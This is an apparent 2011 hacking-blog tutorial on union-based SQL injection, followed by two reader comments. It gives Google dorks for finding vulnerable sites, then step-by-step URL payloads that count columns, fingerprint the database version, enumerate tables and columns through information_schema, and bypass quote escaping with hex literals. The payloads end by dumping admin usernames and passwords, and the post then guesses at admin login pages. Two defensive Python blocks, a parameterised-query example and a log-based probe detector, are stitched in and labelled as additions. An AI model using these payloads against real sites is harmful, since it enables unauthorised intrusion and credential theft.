Monday 5 September 2011

SQL injection tutorial With Pictures

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
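To make the definition above concrete, here is an added example (not code from the original post) showing the exact coding mistake the rest of the tutorial relies on, beside the hardened form. It uses a constructed in-memory SQLite table named `pages` standing in for the `index.php?id=` page; the function names `lookup_vulnerable`, `lookup_hardened` and `probe` are mine. The vulnerable version concatenates the query-string value into the SQL text, so a stray quote breaks the statement and a database error reaches the visitor. The hardened version enforces the type first (an id must be an integer) and then passes the value as a bound parameter, so it can never alter the statement's structure.

```python
import sqlite3


def make_db():
    # Constructed demo table; stands in for the "index.php?id=" page in the tutorial.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Welcome", "hello"), (2, "About", "about us")])
    return conn


def lookup_vulnerable(conn, id_param):
    # The raw query-string value is glued into the SQL text. A trailing quote
    # makes the statement unparseable and the database error leaks to the page,
    # which is the signal the tutorial's "check" looks for.
    sql = "SELECT title FROM pages WHERE id=" + id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, id_param):
    # Strong typing first: anything that is not an integer is rejected before it
    # gets anywhere near the database, so there is no error to observe.
    try:
        page_id = int(id_param)
    except ValueError:
        return None
    # Then a parameterised query: the value travels separately from the SQL
    # text, so "order by" or "union select" fragments are never interpreted.
    row = conn.execute("SELECT title FROM pages WHERE id=?", (page_id,)).fetchone()
    return row[0] if row else None


def probe(id_param):
    # Returns (vulnerable_result, hardened_result). On the vulnerable side a
    # database error is reported as a string so the two can be compared directly.
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, id_param)
    except sqlite3.Error as exc:
        vuln = "DB ERROR: " + type(exc).__name__
    return vuln, lookup_hardened(conn, id_param)


if __name__ == "__main__":
    for value in ["1", "1'", "1 order by 1--"]:
        print(repr(value), "->", probe(value))
```

Run it and the three inputs tell the story: a plain `1` behaves identically in both versions, a trailing `'` produces a database error only in the concatenated version, and `1 order by 1--` is silently accepted by the vulnerable query while the hardened one rejects it as a non-integer before any SQL runs.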


Here are some dorks (searching for these on http://google.com will turn up sites that may be vulnerable):
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
You can also make your own dorks.

How to check whether a site is vulnerable to SQL injection

To check if a site is vulnerable to SQL injection, just put a ' at the end of the URL like this:
http://www.site.com/index.php?id=1'
If the site shows you a database error, it is vulnerable to SQLi,
as shown in the figure below.


Let's say we found a vulnerable site, as shown in the figure above.

First we need to find out how many columns the vulnerable query returns. To do so we use the "order by" clause:

http://www.site.com/index.php?id=1 order by 1-- (No error)
http://www.site.com/index.php?id=1 order by 2-- (No error)
http://www.site.com/index.php?id=1 order by 3-- (No error)
We keep increasing the number until we get an error.

http://www.site.com/index.php?id=1 order by 5-- (No error)
http://www.site.com/index.php?id=1 order by 7-- (No error)
http://www.site.com/index.php?id=1 order by 8-- (Error)
Let's say the query returns 7 columns.

Now we need to find out which of those columns are actually displayed on the page (the ones we can pull data through). To do so we use "union select":

http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7--

Notice that I put a single - in front of the id number (id=-1).
Since there is no page with the id -1, this simply clears the site's normal text, which makes it easier to spot the data we are looking for.

Okay, let's say the numbers 3 and 5 popped up on the site. Those are the columns whose values are displayed on the page (the ones we can get data from). Now we want to find the version of the database. To do so we use "@@version" in either of the displayed columns (3 or 5); I chose 3 for this example:

http://www.site.com/index.php?id=-1 union select 1,2,@@version,4,5,6,7--


And if that doesn't work, try this one:
http://www.site.com/index.php?id=-1 union select 1,2,version(),4,5,6,7--

Now we want to get the name of the database, so we use "concat(database())":

http://www.site.com/index.php?id=-1 union select 1,2,concat(database()),4,5,6,7--
Write that name down so you won't forget it. Let's say the database name I just extracted was exampledatabase.

If the version is 4 or below, it is probably best to just move on to another site, since MySQL 4 has no information_schema and you would have to guess the table names.

If the version is 5 or above, we use this query to list all the tables:

http://www.site.com/index.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
You can also use these:
http://www.site.com/index.php?id=-1 union select 1,2,concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
http://www.site.com/index.php?id=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema=database()--

Now you have the table names. Look through them for tables like these:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)


Once you have found the table you think holds the information you want, use this query (in this example I use admin):

http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name="admin"--

If the site shows you an error here, that means Magic Quotes is turned on and the quotes around "admin" are being escaped. To bypass this we need to write the text "admin" as a hex literal instead.

To do this:
Copy the name of the table you are trying to access.
Visit the site http://www.swingnote.com/tools/texttohex.php
Paste the name into the box where it says "Say Hello To My Little Friend".
Click Convert.
Copy the hex into your query like this:

http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=0x61646d696e--

Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.

You should now see all the columns inside the table.

Now, once again, you have to spot the columns whose contents we want to see.
Let's say there are 2 columns called username and password. To see what is inside those columns we use this query:

http://www.site.com/index.php?id=-1 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from exampledatabase.admin--
(0x3a is the hex for a colon; it just separates each username from its password in the output.)
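Every step walked through above, from the trailing quote to the hex-encoded table name, leaves a distinctive request in the web server's access log. As an added example from the defender's side (not part of the original post), here is a small Python detector that URL-decodes the query string of each request and flags the patterns this tutorial uses: the quote probe, "order by N", "union select", version fingerprinting, information_schema lookups, 0x hex literals and SQL comment markers. The log lines, IP addresses and rule names are constructed for the example; the Apache-style format is the standard common log layout.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not from any real server). The
# query strings mirror the probes walked through in the tutorial.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2011:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Sep/2011:10:00:03 +0000] "GET /index.php?id=1' HTTP/1.1" 500 812
203.0.113.5 - - [05/Sep/2011:10:00:09 +0000] "GET /index.php?id=1%20order%20by%208-- HTTP/1.1" 500 812
203.0.113.5 - - [05/Sep/2011:10:00:15 +0000] "GET /index.php?id=-1%20union%20select%201,2,@@version,4,5,6,7-- HTTP/1.1" 200 4010
203.0.113.5 - - [05/Sep/2011:10:00:40 +0000] "GET /index.php?id=-1%20union%20select%201,2,column_name,4,5,6,7%20from%20information_schema.columns%20where%20table_name=0x61646d696e-- HTTP/1.1" 200 4200
198.51.100.7 - - [05/Sep/2011:10:01:02 +0000] "GET /index.php?id=2 HTTP/1.1" 200 4980
198.51.100.7 - - [05/Sep/2011:10:01:10 +0000] "GET /page.php?file=about HTTP/1.1" 200 3300
"""

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each rule is applied to the URL-decoded, lower-cased query string.
RULES = [
    ("quote_probe",         re.compile(r"=[^&]*'")),               # trailing ' on a value
    ("order_by_probe",      re.compile(r"\border\s+by\s+\d+")),    # column counting
    ("union_select",        re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("version_fingerprint", re.compile(r"@@version|\bversion\(\)")),
    ("schema_enumeration",  re.compile(r"\binformation_schema\.")),
    ("hex_literal",         re.compile(r"\b0x[0-9a-f]{2,}\b")),     # quote-escaping bypass
    ("sql_comment",         re.compile(r"--|/\*")),
]


def analyse_line(line):
    """Parse one access-log line; return a record with the rule names it trips, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query).lower()
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return {"ip": m.group("ip"), "status": int(m.group("status")), "path": path, "hits": hits}


def find_sqli_probes(log_text):
    """Return one record per request that trips at least one rule."""
    out = []
    for line in log_text.splitlines():
        rec = analyse_line(line)
        if rec and rec["hits"]:
            out.append(rec)
    return out


def attacker_ips(log_text, min_hits=2):
    """IPs with at least min_hits flagged requests: a probing sequence, not a stray apostrophe."""
    counts = {}
    for rec in find_sqli_probes(log_text):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for rec in find_sqli_probes(SAMPLE_LOG):
        print(rec["ip"], rec["status"], rec["hits"])
    print("probing sources:", attacker_ips(SAMPLE_LOG))
```

The `min_hits` threshold in `attacker_ips` is the practical part: a single apostrophe in a search term is a common false positive, but the tutorial's method necessarily produces a run of several flagged requests from one source within a short window (quote, order by, union select, information_schema), and the 500 responses that accompany the early probes are the server-side counterpart of the "error on the page" the attacker is looking for.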


Now you have the admin credentials!

Next we have to find the admin login page.

To do so, once again you can use Havij, or you can search for it manually. If you want to search manually, you can try pages like these:

http://www.site.com/admin.php
http://www.site.com/admin.asp
http://www.site.com/admin/
http://www.site.com/adminlogin.php
http://www.site.com/adminlogin.asp
http://www.site.com/adminlogin/
http://www.site.com/login.php
http://www.site.com/login.asp
http://www.site.com/login/

If you have any question or suggestion, leave a comment.

2 comments:

Anonymous said...

Thanks for the info. Please, where can we type those commands: is it in the browser or in the database?

PakH3X0r said...

Yes, you have to type these commands in the address bar. If you are new to web exploiting then SQLi is best; also download my video tutorial on SQL Injection http://h4ckcorner.blogspot.com/2011/09/sql-injection-video-tutorial-by.html
Soon I will write Auto SQLi, SQLi with Havij, Blind SQLi and much more. Keep visiting my blog and comment if you need anything more.